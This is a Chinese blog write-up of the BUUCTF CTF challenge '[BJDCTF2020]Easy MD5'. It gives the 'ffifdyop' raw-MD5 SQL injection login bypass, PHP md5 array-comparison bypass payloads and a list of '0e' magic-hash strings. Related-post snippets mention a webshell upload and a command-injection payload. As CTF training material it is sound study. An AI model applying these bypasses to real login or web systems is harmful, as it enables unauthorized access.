buuctf-web-[BJDCTF2020]Easy MD5-wp

最新推荐文章于 2023-12-25 14:29:41 发布
最新推荐文章于 2023-12-25 14:29:41 发布
阅读量198 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/119035663
版权

[BJDCTF2020]Easy MD5

知识点

  • md5 bypass(数组返回false)

过程

主页,是这么个框框

抓包发现提示

select * from 'admin' where password=md5($pass,true)

16 位 md5 常见套路,输入密码 ffifdyop,登录即可。这是因为它的原始字符串导致了' or 1=1 的 SQL 注入,相当于所谓的万能密码登录。请参考:

https://www.jianshu.com/p/12125291f50d

http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/

登录后,查看网页源代码,发现代码,要求 a 和 b 不等但是 md5 相等:

$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
	//wow,you can really dance
}

又是典型的 md5 bypass,因为 md5() 或者 sha1() 之类的函数计算的是一个字符串的哈希值,对于数组则返回 false,如果 $a$b 都是数组则双双返回 FALSE, 两个 FALSE 相等得以绕过。payload:

/levels91.php?a[]=1&b[]=2

得到代码

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
} 

param1[]=1&param2[]=2

一些md5值
0e开头的md5和原值:
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
easy-web-iframe-master.zip
05-07
官网:https://eleadmin.com/
[BJDCTF2020]Easy MD5 -wp
freerats的博客
06-30 1376
页面上就一搜索框,无论提交什么都没回显,f12查看响应头有提示 select * from ‘admin’ where password=md5($pass,true) 提示了后台查询语句 查看一下md5()函数的true参数 和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到 ffifdyop字符串会造成漏洞 ·在本地环境试验ffifdyop,输出的开头是'or'6xxxxxx 在数据库语句里就构成了select * from ‘admin’ where password= ''o.
日常练习之web(Easy MD5)
doraemon12345的博客
11-25 156
打开题目是这样一个界面,猜测可能是注入问题,试了很久无果 查看源码无意间看到hint 是注入,但是不会,去看大佬wp,发现输入ffifdyop可以绕过,原因是ffifdyop会被解析为16进制276f722736c95d99e921722cf9ed621c,16进制又会被转为ascii,刚好是’or’6,与原句拼接刚好成为一个永真,达到绕过的效果(这里我搜了很多wp都没有很具体解释ffifdyop怎么来的,总之记下就好ffifdyop代表’or’6 以后碰到类似的题可以直接用),绕过之后出现另一个页面
[BJDCTF 2020]easy_md5
m0_73612768的博客
12-25 1190
经过 md5 加密变成万能密码,MD5 加密弱比较和强比较的绕过:科学记数法绕过,数组绕过及原理,MD5 碰撞
BUUCTF:[BJDCTF2020]Easy MD5
末初的CSDN博客
11-04 340
题目地址:https://buuoj.cn/challenges#[BJDCTF2020]Easy%20MD5 /leveldo4.php 查询,注入?MD5,联想到那个神奇的字符串ffifdyop ffifdyop PS C:\Users\Administrator> php -r "var_dump(md5('ffifdyop'));" string(32) "276f722736c95d99e921722cf9ed621c" PS C:\Users\Administrator>.
BUUctfweb:[BJDCTF2020]Easy MD5
羽的博客
07-12 309
搞得像个SQL注入一样,忍不住'#了一下。 后面就不太找得到突破点了。 看来下WP结果意想不到。 Hint: select * from 'admin' where password=md5($pass,true) 响应头里面有个这个。 查查md5函数 md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。可能会返回这样子的字符串:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1和SQL语句拼接就可以是: select * from ‘a...
BUUCTF web wp (五)
m0_55854679的博客
07-29 430
[ACTF2020 新生赛]Upload 打开题目链接点击灯泡即可看到隐隐约约的上传文件的框。 上传一个含有一句话木马的php文件 继续上传一个文件内容为一句话木马的jpg文件,发现使用蚁剑连接不成功,于是我们可以在上传jpg文件时使用burp抓包修改文件后缀为phtml 放包后发现页面提示上传的文件的绝对路径,且文件名被修改 使用蚁剑连接时,注意用被修改过的文件名,连接成功后即可得到flag。 [极客大挑战 2019]BabySQL 又是前面熟悉的SQL注入的题目的背景图 首先尝试万能密码登录,发现数据使
buuctf web1
qq_61768489的博客
03-11 2894
[极客大挑战 2019]EasySQL [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; ...
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
EASY-UI示例;EASY-UI示例
09-13
EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例EASY-UI示例
easy-rsa-2.2.0.tar.gz
06-30
easy-rsa-2.2.0.tar.gz
easy-rsa-old-master.zip
09-29
easy-rsa-old-master.zip . ├── configure.ac ├── COPYING ├── COPYRIGHT.GPL ├── distro │ ├── Makefile.am │ └── rpm │ ├── easy-rsa.spec.in │ └── Makefile.am ├── doc │ ...
easy-en.dict.yaml
最新发布
12-31
easy_en.dict.yaml 是一个 rime小狼毫 输入法所用的 easyEnglish 输入方案的字典文档,该 easy_en.dict.yaml 字典文档中定义了英语词条与编码的对应关系,共记录词条 33万余条。
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 890
1、[极客大挑战 2019]EasySQL
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-28 211
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
BUUCTF平台web writeup
a370793934的专栏
11-28 1456
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
[BJDCTF2020]Easy MD5
qq_52718293的博客
10-17 78
距离上次写wp还是四个月之前,这题打开之后是这样的。我先尝试了sql注入,放 ’ / "什么的都没什么反应,所以试试抓包 这是主要代码 select * from ‘admin’ where password=md5($pass,true) 这里写了一个md5( ) 函数 我们可以看到,我们的raw位置写的是true,由md5()函数可知,此代码会返回16字符的二进制 ...
[BUUCTF][VNCTF2022公开赛]web wp
cosmoslin的博客
02-14 2394
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3458
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
uni-app怎样自定义uni-easyinput组件样式
06-03
要自定义 `uni-easyinput` 组件的样式,可以使用以下步骤: 1. 在页面的 `.vue` 文件中,定义一个样式类,例如: ```css .custom-easyinput { background-color: #f5f5f5; border: none; border-radius: 10px; ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值